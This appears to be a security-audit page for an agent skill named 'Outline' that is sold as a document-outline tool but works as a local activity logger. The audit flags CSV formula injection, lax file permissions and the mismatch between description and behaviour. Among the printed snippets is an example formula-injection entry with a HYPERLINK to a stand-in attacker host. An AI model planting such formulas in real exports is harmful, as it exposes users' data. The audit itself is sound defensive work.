Back to skill

Security audit

Outline

Security checks for vulnerabilities and agentic risk

Overview

This package is presented as a document-outline skill, but the inspected artifact is a local activity logger that persistently stores, searches, and exports user-entered text.

Install only if you want a local plaintext productivity/activity logger, not a document-outline generator. Avoid storing secrets or sensitive plans, review permissions on ~/.local/share/outline, and be careful opening CSV exports in spreadsheet apps.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (2)

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/script.sh:77
Finding

CSV Formula Injection in Exported User Entries

Content
View full analysis

Vulnerability Details

File Location: scripts/script.sh, lines 77-83
Vulnerability Type: CSV formula injection caused by insufficient output encoding
Risk Level: Medium

Vulnerable Code

bash
csv)
    echo "type,time,value" > "$out"
    for f in "$DATA_DIR"/*.log; do
        [ -f "$f" ] || continue
        local name=$(basename "$f" .log)
        while IFS='|' read -r ts val; do
            echo "$name,$ts,$val" >> "$out"

The val variable contains user-controlled entry text. It is written directly to a CSV field without quoting, escaping, or neutralizing spreadsheet formula prefixes.

Technical Analysis

Spreadsheet applications may interpret cells beginning with characters such as =, +, -, or @ as formulas rather than plain text. Because every entry command permits arbitrary text and _export writes that text directly to export.csv, an attacker can create a stored entry containing a malicious spreadsheet formula.

The export logic also fails to apply RFC 4180 CSV escaping. Commas, quotation marks, and line breaks in an entry can alter the CSV column or record structure, making it easier to position attacker-controlled content in a formula-capable cell.

Formula execution behavior depends on the spreadsheet application and its security configuration. Possible formula effects include initiating external requests, exposing spreadsheet data through attacker-controlled URLs, misleading the user with manipulated content, or invoking other spreadsheet-specific functionality.

Attack Path

  1. An attacker supplies or persuades the user to record an entry whose first character is a spreadsheet formula prefix. For example:

    bash
    outline add '=HYPERLINK("https://attacker.example/collect","Open report")'
    
  2. The script stores the value in ~/.local/share/outline/add.log.

  3. The user runs:

    bash
    outline export csv
    

...[truncated 887 chars]

Remediation
View remediation

Remediation Suggestions

Implement a dedicated CSV-encoding function for every field:

  1. Escape embedded double quotes by replacing each " with "".
  2. Enclose every field in double quotes.
  3. Neutralize fields whose first non-whitespace character is =, +, -, or @, for example by prefixing a single quote.
  4. Apply the protection to all fields, including name, ts, and val.
  5. Add tests covering formulas, commas, quotes, carriage returns, and line breaks.
  6. Document that exported files may contain untrusted content and should be imported with formula evaluation disabled.

A safer implementation should generate records using a well-tested CSV serializer where possible. If Bash must be retained, use an explicit encoding function and printf rather than concatenating fields with echo.

T09 · Insecure Skill Coding Practices

Note
Location
scripts/script.sh:5
Finding

Sensitive Local Records Created Without Enforced Restrictive Permissions

Content
View full analysis

Vulnerability Details

File Location: scripts/script.sh, lines 5-8
Vulnerability Type: Insecure local data permissions
Risk Level: Low

Vulnerable Code

bash
set -euo pipefail

DATA_DIR="${HOME}/.local/share/outline"
mkdir -p "$DATA_DIR"

_log() { echo "$(date '+%m-%d %H:%M') $1: $2" >> "$DATA_DIR/history.log"; }

The script creates its data directory and appends records without setting a restrictive umask or explicitly enforcing directory and file modes.

Technical Analysis

The effective permissions of ~/.local/share/outline, its log files, and generated exports depend entirely on the invoking process's umask and any pre-existing filesystem objects. Under a permissive umask, files containing plans, reminders, reports, activity history, and exports may be readable by other local users.

The issue also applies when the directory or files already exist with unsafe permissions. mkdir -p does not correct permissions on an existing directory, and ordinary append or overwrite operations do not automatically restrict an existing file's mode.

The application is specifically designed to retain potentially private productivity information. Consequently, relying on ambient permission defaults does not provide a dependable confidentiality boundary.

Attack Path

  1. A user runs the tool in an environment with a permissive umask, or the data directory already exists with broad permissions.
  2. The script creates or updates logs and exports without enforcing private modes.
  3. The user records confidential plans, reminders, reviews, reports, or other sensitive text.
  4. Another local account enumerates the accessible directory and reads the affected files.
  5. The local account obtains the stored information without needing to compromise the application process.

Exploitation requires local filesystem access and permissions that allow the attacker to traverse the user's home-director ...[truncated 599 chars]

Remediation
View remediation

Remediation Suggestions

Enforce private permissions before creating any data:

bash
umask 077
DATA_DIR="${HOME}/.local/share/outline"
mkdir -p -m 700 "$DATA_DIR"
chmod 700 "$DATA_DIR"

Additionally:

  1. Create logs and exports with mode 0600.
  2. Correct unsafe modes on pre-existing application-owned files before reading or writing them.
  3. Reject symbolic links and unexpected non-regular files in the data directory where practical.
  4. Verify that the data directory is owned by the current user.
  5. Avoid recursively changing permissions on unknown files; validate ownership and file type first.
  6. Document that entries are stored in plaintext and should not contain secrets unless the host filesystem provides suitable protection.
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (7)

Tp4

High
Category
MCP Tool Poisoning
Confidence
99% confidence
Finding

The manifest and skill name claim a document-outline utility, but the body describes a broad local logging and tracking system that persistently stores arbitrary user input, supports search, and exports accumulated data. This mismatch is dangerous because an agent or user may grant or invoke the skill under false assumptions, causing sensitive notes or prompts to be retained and exposed through later search/export operations.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

High
Category
Not specified by scanner
Confidence
99% confidence
Finding

The documented behavior is materially different from the declared purpose: instead of structuring documents, it operates as a general-purpose activity logger with persistent local storage and retrieval features. In an agent ecosystem, this kind of scope deception can bypass user expectations and safety review, leading to unanticipated collection and later disclosure of potentially sensitive data.

Content

No source excerpt is available for this finding.

Intent-Code Divergence

High
Category
Not specified by scanner
Confidence
98% confidence
Finding

The title and manifest present one trust boundary and use case, while the main documentation describes a different tool class entirely: a timestamped task-and-idea logging system. This undermines informed consent and safe tool selection, making the context more dangerous because users seeking harmless outline assistance may instead route sensitive planning data into persistent audit logs.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

High
Category
Not specified by scanner
Confidence
98% confidence
Finding

The advertised skill purpose is document outline generation, but the implemented commands are a broad activity tracker that persistently logs user input under the home directory. This mismatch is dangerous because users or orchestrators may grant and invoke the skill expecting narrow document-structuring behavior, while it actually collects and retains arbitrary user content unrelated to that purpose.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

High
Category
Not specified by scanner
Confidence
98% confidence
Finding

The export functionality serializes and writes all collected log contents to JSON, CSV, or text files, confirming that the skill is acting as a general-purpose data collection and exfiltration-friendly store rather than an outline generator. In the context of a misrepresented skill, this magnifies privacy risk because arbitrary user input is accumulated and easily bulk-exported from persistent storage.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

The skill exposes a broad set of unrelated productivity and tracking functions, including reminders, streaks, archives, weekly reviews, and full-text search/export, which expand the data collection and disclosure surface well beyond an outline tool. This is risky because users may input personal or operationally sensitive information into a skill whose name and description do not suggest long-term retention or bulk extraction features.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The command set includes unrelated habit and productivity functions such as streak, remind, prioritize, archive, and report, which are unjustified for an outline tool. Excess capability increases attack surface and creates a deceptive skill boundary, making it easier to capture or retain sensitive user inputs under a misleading description.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.